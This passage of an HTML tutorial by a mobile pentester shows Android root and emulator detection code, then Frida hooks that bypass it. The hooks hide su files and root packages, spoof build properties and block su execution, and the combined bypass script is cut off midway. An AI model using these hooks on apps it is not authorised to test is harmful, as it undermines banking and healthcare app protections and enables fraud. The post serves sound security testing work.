href="/android-pentesting/2025/12/13/apk-reverse-engineering-workflow/">APK reverse engineering</a>. Now let’s deal with the thing that stops most of those techniques from working in the first place — root detection and emulator checks.</p> <p>Almost every app I assess on mobile engagements has some form of environment detection. Banking apps, healthcare apps, anything handling sensitive data. The app launches, detects you’re on a rooted device or emulator, and either exits or degrades functionality. This is annoying when you need to actually test the app.</p> <p>Let’s break all of it.</p> <h2 id="how-root-detection-works">How Root Detection Works</h2> <p>Root detection isn’t one technique — it’s a pile of heuristics. Apps check multiple indicators and combine the results. Here’s what they typically look for.</p> <h3 id="file-based-checks">File-Based Checks</h3> <p>The most common approach. Apps look for files that exist on rooted devices:</p> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Typical root detection code you'll find when decompiling</span> <span class="kd">private</span> <span class="kt">boolean</span> <span class="nf">isRooted</span><span class="o">()</span> <span class="o">{</span> <span class="nc">String</span><span class="o">[]</span> <span class="n">paths</span> <span class="o">=</span> <span class="o">{</span> <span class="s">"/system/app/Superuser.apk"</span><span class="o">,</span> <span class="s">"/system/xbin/su"</span><span class="o">,</span> <span class="s">"/system/bin/su"</span><span class="o">,</span> <span class="s">"/sbin/su"</span><span class="o">,</span> <span class="s">"/data/local/xbin/su"</span><span class="o">,</span> <span class="s">"/data/local/bin/su"</span><span class="o">,</span> <span class="s">"/data/local/su"</span><span class="o">,</span> <span class="s">"/su/bin/su"</span><span class="o">,</span> <span class="s">"/system/bin/.ext/.su"</span><span class="o">,</span> <span class="s">"/system/etc/.has_su_daemon"</span><span class="o">,</span> <span class="s">"/system/etc/.installed_su_daemon"</span> <span class="o">};</span> <span class="k">for</span> <span class="o">(</span><span class="nc">String</span> <span class="n">path</span> <span class="o">:</span> <span class="n">paths</span><span class="o">)</span> <span class="o">{</span> <span class="k">if</span> <span class="o">(</span><span class="k">new</span> <span class="nc">File</span><span class="o">(</span><span class="n">path</span><span class="o">).</span><span class="na">exists</span><span class="o">())</span> <span class="k">return</span> <span class="kc">true</span><span class="o">;</span> <span class="o">}</span> <span class="k">return</span> <span class="kc">false</span><span class="o">;</span> <span class="o">}</span> </code></pre></div></div> <h3 id="package-based-checks">Package-Based Checks</h3> <p>Apps query the package manager for known root management apps:</p> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">private</span> <span class="kt">boolean</span> <span class="nf">hasRootPackages</span><span class="o">()</span> <span class="o">{</span> <span class="nc">String</span><span class="o">[]</span> <span class="n">packages</span> <span class="o">=</span> <span class="o">{</span> <span class="s">"com.topjohnwu.magisk"</span><span class="o">,</span> <span class="s">"eu.chainfire.supersu"</span><span class="o">,</span> <span class="s">"com.koushikdutta.superuser"</span><span class="o">,</span> <span class="s">"com.thirdparty.superuser"</span><span class="o">,</span> <span class="s">"com.yellowes.su"</span><span class="o">,</span> <span class="s">"com.noshufou.android.su"</span> <span class="o">};</span> <span class="nc">PackageManager</span> <span class="n">pm</span> <span class="o">=</span> <span class="n">getPackageManager</span><span class="o">();</span> <span class="k">for</span> <span class="o">(</span><span class="nc">String</span> <span class="n">pkg</span> <span class="o">:</span> <span class="n">packages</span><span class="o">)</span> <span class="o">{</span> <span class="k">try</span> <span class="o">{</span> <span class="n">pm</span><span class="o">.</span><span class="na">getPackageInfo</span><span class="o">(</span><span class="n">pkg</span><span class="o">,</span> <span class="mi">0</span><span class="o">);</span> <span class="k">return</span> <span class="kc">true</span><span class="o">;</span> <span class="o">}</span> <span class="k">catch</span> <span class="o">(</span><span class="nc">NameNotFoundException</span> <span class="n">e</span><span class="o">)</span> <span class="o">{}</span> <span class="o">}</span> <span class="k">return</span> <span class="kc">false</span><span class="o">;</span> <span class="o">}</span> </code></pre></div></div> <h3 id="command-execution">Command Execution</h3> <p>Some apps try to actually run <code class="language-plaintext highlighter-rouge">su</code>:</p> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">private</span> <span class="kt">boolean</span> <span class="nf">canRunSu</span><span class="o">()</span> <span class="o">{</span> <span class="k">try</span> <span class="o">{</span> <span class="nc">Runtime</span><span class="o">.</span><span class="na">getRuntime</span><span class="o">().</span><span class="na">exec</span><span class="o">(</span><span class="s">"su"</span><span class="o">);</span> <span class="k">return</span> <span class="kc">true</span><span class="o">;</span> <span class="o">}</span> <span class="k">catch</span> <span class="o">(</span><span class="nc">Exception</span> <span class="n">e</span><span class="o">)</span> <span class="o">{</span> <span class="k">return</span> <span class="kc">false</span><span class="o">;</span> <span class="o">}</span> <span class="o">}</span> </code></pre></div></div> <h3 id="system-properties">System Properties</h3> <p>Checking build properties for test-keys, custom ROMs, or debug builds:</p> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">private</span> <span class="kt">boolean</span> <span class="nf">hasTestKeys</span><span class="o">()</span> <span class="o">{</span> <span class="nc">String</span> <span class="n">buildTags</span> <span class="o">=</span> <span class="n">android</span><span class="o">.</span><span class="na">os</span><span class="o">.</span><span class="na">Build</span><span class="o">.</span><span class="na">TAGS</span><span class="o">;</span> <span class="k">return</span> <span class="n">buildTags</span> <span class="o">!=</span> <span class="kc">null</span> <span class="o">&amp;&amp;</span> <span class="n">buildTags</span><span class="o">.</span><span class="na">contains</span><span class="o">(</span><span class="s">"test-keys"</span><span class="o">);</span> <span class="o">}</span> <span class="kd">private</span> <span class="kt">boolean</span> <span class="nf">isDebuggable</span><span class="o">()</span> <span class="o">{</span> <span class="k">return</span> <span class="o">(</span><span class="n">getApplicationInfo</span><span class="o">().</span><span class="na">flags</span> <span class="o">&amp;</span> <span class="nc">ApplicationInfo</span><span class="o">.</span><span class="na">FLAG_DEBUGGABLE</span><span class="o">)</span> <span class="o">!=</span> <span class="mi">0</span><span class="o">;</span> <span class="o">}</span> </code></pre></div></div> <h3 id="safetynet--play-integrity">SafetyNet / Play Integrity</h3> <p>The nuclear option. Google’s server-side attestation checks device integrity, bootloader status, and software state. This is the hardest to bypass because the attestation happens server-side.</p> <h2 id="emulator-detection">Emulator Detection</h2> <p>Apps use overlapping techniques to detect emulators:</p> <h3 id="build-properties">Build Properties</h3> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">private</span> <span class="kt">boolean</span> <span class="nf">isEmulator</span><span class="o">()</span> <span class="o">{</span> <span class="k">return</span> <span class="nc">Build</span><span class="o">.</span><span class="na">FINGERPRINT</span><span class="o">.</span><span class="na">contains</span><span class="o">(</span><span class="s">"generic"</span><span class="o">)</span> <span class="o">||</span> <span class="nc">Build</span><span class="o">.</span><span class="na">MODEL</span><span class="o">.</span><span class="na">contains</span><span class="o">(</span><span class="s">"google_sdk"</span><span class="o">)</span> <span class="o">||</span> <span class="nc">Build</span><span class="o">.</span><span class="na">MODEL</span><span class="o">.</span><span class="na">contains</span><span class="o">(</span><span class="s">"Emulator"</span><span class="o">)</span> <span class="o">||</span> <span class="nc">Build</span><span class="o">.</span><span class="na">MODEL</span><span class="o">.</span><span class="na">contains</span><span class="o">(</span><span class="s">"Android SDK built for x86"</span><span class="o">)</span> <span class="o">||</span> <span class="nc">Build</span><span class="o">.</span><span class="na">MANUFACTURER</span><span class="o">.</span><span class="na">contains</span><span class="o">(</span><span class="s">"Genymotion"</span><span class="o">)</span> <span class="o">||</span> <span class="nc">Build</span><span class="o">.</span><span class="na">BRAND</span><span class="o">.</span><span class="na">startsWith</span><span class="o">(</span><span class="s">"generic"</span><span class="o">)</span> <span class="o">||</span> <span class="nc">Build</span><span class="o">.</span><span class="na">DEVICE</span><span class="o">.</span><span class="na">startsWith</span><span class="o">(</span><span class="s">"generic"</span><span class="o">)</span> <span class="o">||</span> <span class="nc">Build</span><span class="o">.</span><span class="na">HARDWARE</span><span class="o">.</span><span class="na">contains</span><span class="o">(</span><span class="s">"goldfish"</span><span class="o">)</span> <span class="o">||</span> <span class="nc">Build</span><span class="o">.</span><span class="na">HARDWARE</span><span class="o">.</span><span class="na">contains</span><span class="o">(</span><span class="s">"ranchu"</span><span class="o">)</span> <span class="o">||</span> <span class="nc">Build</span><span class="o">.</span><span class="na">PRODUCT</span><span class="o">.</span><span class="na">contains</span><span class="o">(</span><span class="s">"sdk"</span><span class="o">)</span> <span class="o">||</span> <span class="nc">Build</span><span class="o">.</span><span class="na">PRODUCT</span><span class="o">.</span><span class="na">contains</span><span class="o">(</span><span class="s">"vbox86p"</span><span class="o">);</span> <span class="o">}</span> </code></pre></div></div> <h3 id="hardware-indicators">Hardware Indicators</h3> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Sensor check - emulators have fewer/fake sensors</span> <span class="nc">SensorManager</span> <span class="n">sm</span> <span class="o">=</span> <span class="o">(</span><span class="nc">SensorManager</span><span class="o">)</span> <span class="n">getSystemService</span><span class="o">(</span><span class="no">SENSOR_SERVICE</span><span class="o">);</span> <span class="kt">int</span> <span class="n">sensorCount</span> <span class="o">=</span> <span class="n">sm</span><span class="o">.</span><span class="na">getSensorList</span><span class="o">(</span><span class="nc">Sensor</span><span class="o">.</span><span class="na">TYPE_ALL</span><span class="o">).</span><span class="na">size</span><span class="o">();</span> <span class="c1">// Real devices typically have 15+ sensors, emulators have &lt; 5</span> <span class="c1">// Telephony check</span> <span class="nc">TelephonyManager</span> <span class="n">tm</span> <span class="o">=</span> <span class="o">(</span><span class="nc">TelephonyManager</span><span class="o">)</span> <span class="n">getSystemService</span><span class="o">(</span><span class="no">TELEPHONY_SERVICE</span><span class="o">);</span> <span class="nc">String</span> <span class="n">phoneNumber</span> <span class="o">=</span> <span class="n">tm</span><span class="o">.</span><span class="na">getLine1Number</span><span class="o">();</span> <span class="c1">// Emulators often return "15555215554" or similar</span> <span class="c1">// Battery check - emulators report specific battery states</span> </code></pre></div></div> <h3 id="timing-and-performance-checks">Timing and Performance Checks</h3> <p>Some sophisticated apps measure execution timing. Emulators are slower at certain operations like floating point math or file I/O, giving them away.</p> <h2 id="bypassing-everything-with-frida">Bypassing Everything with Frida</h2> <p>Now the fun part. We have a few approaches depending on how much time you want to spend.</p> <h3 id="quick-win-hook-the-detection-methods-directly">Quick Win: Hook the Detection Methods Directly</h3> <p>If you’ve decompiled the APK and found the detection methods, just override them:</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">Java</span><span class="p">.</span><span class="nf">perform</span><span class="p">(</span><span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">rootCheck</span> <span class="o">=</span> <span class="nx">Java</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="dl">"</span><span class="s2">com.target.security.RootDetector</span><span class="dl">"</span><span class="p">);</span> <span class="nx">rootCheck</span><span class="p">.</span><span class="nx">isRooted</span><span class="p">.</span><span class="nx">implementation</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">[*] isRooted() called - returning false</span><span class="dl">"</span><span class="p">);</span> <span class="k">return</span> <span class="kc">false</span><span class="p">;</span> <span class="p">};</span> <span class="nx">rootCheck</span><span class="p">.</span><span class="nx">isEmulator</span><span class="p">.</span><span class="nx">implementation</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">[*] isEmulator() called - returning false</span><span class="dl">"</span><span class="p">);</span> <span class="k">return</span> <span class="kc">false</span><span class="p">;</span> <span class="p">};</span> <span class="p">});</span> </code></pre></div></div> <p>This works when the detection is in one class. But most serious implementations spread checks across multiple classes or use obfuscated names.</p> <h3 id="comprehensive-hook-the-underlying-apis">Comprehensive: Hook the Underlying APIs</h3> <p>Instead of finding each detection method, hook the system APIs that all detection relies on:</p> <p><strong>File.exists() bypass:</strong></p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">Java</span><span class="p">.</span><span class="nf">perform</span><span class="p">(</span><span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">File</span> <span class="o">=</span> <span class="nx">Java</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="dl">"</span><span class="s2">java.io.File</span><span class="dl">"</span><span class="p">);</span> <span class="kd">var</span> <span class="nx">blacklist</span> <span class="o">=</span> <span class="p">[</span> <span class="dl">"</span><span class="s2">su</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">Superuser.apk</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">magisk</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">busybox</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">.has_su_daemon</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">.installed_su_daemon</span><span class="dl">"</span> <span class="p">];</span> <span class="nx">File</span><span class="p">.</span><span class="nx">exists</span><span class="p">.</span><span class="nx">implementation</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">path</span> <span class="o">=</span> <span class="k">this</span><span class="p">.</span><span class="nf">getAbsolutePath</span><span class="p">();</span> <span class="k">for </span><span class="p">(</span><span class="kd">var</span> <span class="nx">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o">&lt;</span> <span class="nx">blacklist</span><span class="p">.</span><span class="nx">length</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span> <span class="k">if </span><span class="p">(</span><span class="nx">path</span><span class="p">.</span><span class="nf">indexOf</span><span class="p">(</span><span class="nx">blacklist</span><span class="p">[</span><span class="nx">i</span><span class="p">])</span> <span class="o">!==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">[*] File.exists(</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">path</span> <span class="o">+</span> <span class="dl">"</span><span class="s2">) -&gt; false</span><span class="dl">"</span><span class="p">);</span> <span class="k">return</span> <span class="kc">false</span><span class="p">;</span> <span class="p">}</span> <span class="p">}</span> <span class="k">return</span> <span class="k">this</span><span class="p">.</span><span class="nf">exists</span><span class="p">();</span> <span class="p">};</span> <span class="p">});</span> </code></pre></div></div> <p><strong>PackageManager bypass:</strong></p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">Java</span><span class="p">.</span><span class="nf">perform</span><span class="p">(</span><span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">PM</span> <span class="o">=</span> <span class="nx">Java</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="dl">"</span><span class="s2">android.app.ApplicationPackageManager</span><span class="dl">"</span><span class="p">);</span> <span class="kd">var</span> <span class="nx">blockedPkgs</span> <span class="o">=</span> <span class="p">[</span> <span class="dl">"</span><span class="s2">com.topjohnwu.magisk</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">eu.chainfire.supersu</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">com.koushikdutta.superuser</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">com.noshufou.android.su</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">com.thirdparty.superuser</span><span class="dl">"</span> <span class="p">];</span> <span class="nx">PM</span><span class="p">.</span><span class="nx">getPackageInfo</span><span class="p">.</span><span class="nf">overload</span><span class="p">(</span><span class="dl">"</span><span class="s2">java.lang.String</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">int</span><span class="dl">"</span><span class="p">).</span><span class="nx">implementation</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">pkg</span><span class="p">,</span> <span class="nx">flags</span><span class="p">)</span> <span class="p">{</span> <span class="k">if </span><span class="p">(</span><span class="nx">blockedPkgs</span><span class="p">.</span><span class="nf">indexOf</span><span class="p">(</span><span class="nx">pkg</span><span class="p">)</span> <span class="o">!==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">[*] Hiding package: </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">pkg</span><span class="p">);</span> <span class="k">throw</span> <span class="nx">Java</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="dl">"</span><span class="s2">android.content.pm.PackageManager$NameNotFoundException</span><span class="dl">"</span><span class="p">).</span><span class="nf">$new</span><span class="p">(</span><span class="nx">pkg</span><span class="p">);</span> <span class="p">}</span> <span class="k">return</span> <span class="k">this</span><span class="p">.</span><span class="nf">getPackageInfo</span><span class="p">(</span><span class="nx">pkg</span><span class="p">,</span> <span class="nx">flags</span><span class="p">);</span> <span class="p">};</span> <span class="p">});</span> </code></pre></div></div> <p><strong>Build properties bypass:</strong></p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">Java</span><span class="p">.</span><span class="nf">perform</span><span class="p">(</span><span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">Build</span> <span class="o">=</span> <span class="nx">Java</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="dl">"</span><span class="s2">android.os.Build</span><span class="dl">"</span><span class="p">);</span> <span class="c1">// Spoof to look like a real device</span> <span class="nx">Build</span><span class="p">.</span><span class="nx">FINGERPRINT</span><span class="p">.</span><span class="nx">value</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">google/walleye/walleye:11/RP1A.200720.009/6720564:user/release-keys</span><span class="dl">"</span><span class="p">;</span> <span class="nx">Build</span><span class="p">.</span><span class="nx">MODEL</span><span class="p">.</span><span class="nx">value</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">Pixel 2</span><span class="dl">"</span><span class="p">;</span> <span class="nx">Build</span><span class="p">.</span><span class="nx">MANUFACTURER</span><span class="p">.</span><span class="nx">value</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">Google</span><span class="dl">"</span><span class="p">;</span> <span class="nx">Build</span><span class="p">.</span><span class="nx">BRAND</span><span class="p">.</span><span class="nx">value</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">google</span><span class="dl">"</span><span class="p">;</span> <span class="nx">Build</span><span class="p">.</span><span class="nx">DEVICE</span><span class="p">.</span><span class="nx">value</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">walleye</span><span class="dl">"</span><span class="p">;</span> <span class="nx">Build</span><span class="p">.</span><span class="nx">PRODUCT</span><span class="p">.</span><span class="nx">value</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">walleye</span><span class="dl">"</span><span class="p">;</span> <span class="nx">Build</span><span class="p">.</span><span class="nx">HARDWARE</span><span class="p">.</span><span class="nx">value</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">walleye</span><span class="dl">"</span><span class="p">;</span> <span class="nx">Build</span><span class="p">.</span><span class="nx">TAGS</span><span class="p">.</span><span class="nx">value</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">release-keys</span><span class="dl">"</span><span class="p">;</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">[*] Build properties spoofed to Pixel 2</span><span class="dl">"</span><span class="p">);</span> <span class="p">});</span> </code></pre></div></div> <p><strong>Runtime.exec bypass (block su execution):</strong></p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">Java</span><span class="p">.</span><span class="nf">perform</span><span class="p">(</span><span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">Runtime</span> <span class="o">=</span> <span class="nx">Java</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="dl">"</span><span class="s2">java.lang.Runtime</span><span class="dl">"</span><span class="p">);</span> <span class="nx">Runtime</span><span class="p">.</span><span class="nx">exec</span><span class="p">.</span><span class="nf">overload</span><span class="p">(</span><span class="dl">"</span><span class="s2">java.lang.String</span><span class="dl">"</span><span class="p">).</span><span class="nx">implementation</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">cmd</span><span class="p">)</span> <span class="p">{</span> <span class="k">if </span><span class="p">(</span><span class="nx">cmd</span><span class="p">.</span><span class="nf">indexOf</span><span class="p">(</span><span class="dl">"</span><span class="s2">su</span><span class="dl">"</span><span class="p">)</span> <span class="o">!==</span> <span class="o">-</span><span class="mi">1</span> <span class="o">||</span> <span class="nx">cmd</span><span class="p">.</span><span class="nf">indexOf</span><span class="p">(</span><span class="dl">"</span><span class="s2">which</span><span class="dl">"</span><span class="p">)</span> <span class="o">!==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">[*] Blocked exec: </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">cmd</span><span class="p">);</span> <span class="k">throw</span> <span class="nx">Java</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="dl">"</span><span class="s2">java.io.IOException</span><span class="dl">"</span><span class="p">).</span><span class="nf">$new</span><span class="p">(</span><span class="dl">"</span><span class="s2">Permission denied</span><span class="dl">"</span><span class="p">);</span> <span class="p">}</span> <span class="k">return</span> <span class="k">this</span><span class="p">.</span><span class="nf">exec</span><span class="p">(</span><span class="nx">cmd</span><span class="p">);</span> <span class="p">};</span> <span class="c1">// Also catch the String[] overload</span> <span class="nx">Runtime</span><span class="p">.</span><span class="nx">exec</span><span class="p">.</span><span class="nf">overload</span><span class="p">(</span><span class="dl">"</span><span class="s2">[Ljava.lang.String;</span><span class="dl">"</span><span class="p">).</span><span class="nx">implementation</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">cmds</span><span class="p">)</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">cmdStr</span> <span class="o">=</span> <span class="nx">cmds</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span><span class="dl">"</span><span class="s2"> </span><span class="dl">"</span><span class="p">);</span> <span class="k">if </span><span class="p">(</span><span class="nx">cmdStr</span><span class="p">.</span><span class="nf">indexOf</span><span class="p">(</span><span class="dl">"</span><span class="s2">su</span><span class="dl">"</span><span class="p">)</span> <span class="o">!==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">[*] Blocked exec: </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">cmdStr</span><span class="p">);</span> <span class="k">throw</span> <span class="nx">Java</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="dl">"</span><span class="s2">java.io.IOException</span><span class="dl">"</span><span class="p">).</span><span class="nf">$new</span><span class="p">(</span><span class="dl">"</span><span class="s2">Permission denied</span><span class="dl">"</span><span class="p">);</span> <span class="p">}</span> <span class="k">return</span> <span class="k">this</span><span class="p">.</span><span class="nf">exec</span><span class="p">(</span><span class="nx">cmds</span><span class="p">);</span> <span class="p">};</span> <span class="p">});</span> </code></pre></div></div> <h3 id="the-combined-script">The Combined Script</h3> <p>In practice I use a single script that combines all these bypasses. Save this as <code class="language-plaintext highlighter-rouge">bypass-detection.js</code>:</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">Java</span><span class="p">.</span><span class="nf">perform</span><span class="p">(</span><span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">[*] Root/Emulator detection bypass loaded</span><span class="dl">"</span><span class="p">);</span> <span class="c1">// ===== File.exists bypass =====</span> <span class="kd">var</span> <span class="nx">File</span> <span class="o">=</span> <span class="nx">Java</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="dl">"</span><span class="s2">java.io.File</span><span class="dl">"</span><span class="p">);</span> <span class="kd">var</span> <span class="nx">blacklistedFiles</span> <span class="o">=</span> <span class="p">[</span> <span class="dl">"</span><span class="s2">su</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">Superuser</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">magisk</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">busybox</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">daemonsu</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">.has_su_daemon</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">.installed_su_daemon</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">supersu</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">frida</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">xposed</span><span class="dl">"</span> <span class="p">];</span> <span class="nx">File</span><span class="p">.</span><span class="nx">exists</span><span class="p">.</span><span class="nx">implementation</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">path</span> <span class="o">=</span> <span class="k">this</span><span class="p">.</span><span class="nf">getAbsolutePath</span><span class="p">();</span> <span class="k">for </span><span class="p">(</span><span class="kd">var</span> <span class="nx">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o">&lt;</span> <span class="nx">blacklistedFiles</span><span class="p">.</span><span class="nx">length</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span> <span class="k">if </span><span class="p">(</span><span class="nx">path</span><span class="p">.</span><span class="nf">toLowerCase</span><span class="p">().</span><span class="nf">indexOf</span><span class="p">(</span><span class="nx">blacklistedFiles</span><span class="p">[</span><span class="nx">i</span><span class="p">])</span> <span class="o">!==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">[*] Hiding file: </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">path</span><span class="p">);</span> <span class="k">return</span> <span class="kc">false</span><span class="p">;</span> <span class="p">}</span> <span class="p">}</span> <span class="k">return</span> <span class="k">this</span><span class="p">.</span><span class="nf">exists</span><span class="p">();</span> <span class="p">};</span> <span class="c1">// ===== Build property spoofing =====</span> <span class="kd">var</span> <span class="nx">Build</span> <span class="o">=</span> <span class="nx">Java</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="dl">"</span><span class="s2">android.os.Build</span><span class="dl">"</span><span class="p">);</span> <span class="nx">Build</span><span class="p">.</span><span class="nx">FINGERPRINT</span><span class="p">.</span><span class="nx">value</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">google/walleye/walleye:11/RP1A.200720.009/6720564:user/release-keys</span><span class="dl">"</span><span class="p">;</span> <span class="nx">Build</span><span class="p">.</span><span class="nx">MODEL</span><span class="p">.</span><span class="nx">value</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">Pixel 2</span><span class="dl">"</span><span class="p">;</span> <span class="nx">Build</span><span class="p">.</span><span class="nx">MANUFACTURER</span><span class="p">.</span><span class="nx">value</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">Google</span><span class="dl">"</span><span class="p">;</span> <span class="nx">Build</span><span class="p">.</span><span class="nx">BRAND</span><span class="p">.</span><span class="nx">value</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">google</span><span class="dl">"</span><span class="p">;</span> <span class="nx">Build</span><span class="p">.</span><span class="nx">DEVICE</span><span class="p">.</span><span class="nx">value</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">walleye</span><span class="dl">"</span><span class="p">;</span> <span class="nx">Build</span><span class="p">.</span><span class="nx">PRODUCT</span><span class="p">.</span><span class="nx">value</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">walleye</span><span class="dl">"</span><span class="p">;</span> <span class="nx">Build</span><span class="p">.</span><span class="nx">HARDWARE</span><span class="p">.</span><span class="nx">value</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">walleye</span><span class="dl">"</span><span class="p">;</span> <span class="nx">Build</span><span class="p">.</span><span class="nx">TAGS</span><span class="p">.</span><span class="nx">value</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">release-keys</span><span class="dl">"</span><span class="p">;</span> <span class="nx">Build</span><span class="p">.</span><span class="nx">HOST</span><span class="p">.</span><span class="nx">value</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">wphr1.hot.corp.google.com</span><span class="dl">"</span><span class="p">;</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">[*] Build properties spoofed</span><span class="dl">"</span><span class="p">);</span> <span class="c1">// ===== Package manager bypass =====</span> <span class="kd">var</span> <span class="nx">PM</span> <span class="o">=</span> <span class="nx">Java</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="dl">"</span><span class="s2">android.app.ApplicationPackageManager</span><span class="dl">"</span><span class="p">);</span> <span class="kd">var</span> <span class="nx">hiddenPkgs</span> <span class="o">=</span> <span class="p">[</span> <span class="dl">"</span><span class="s2">com.topjohnwu.magisk</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">eu.chainfire.supersu</span><span 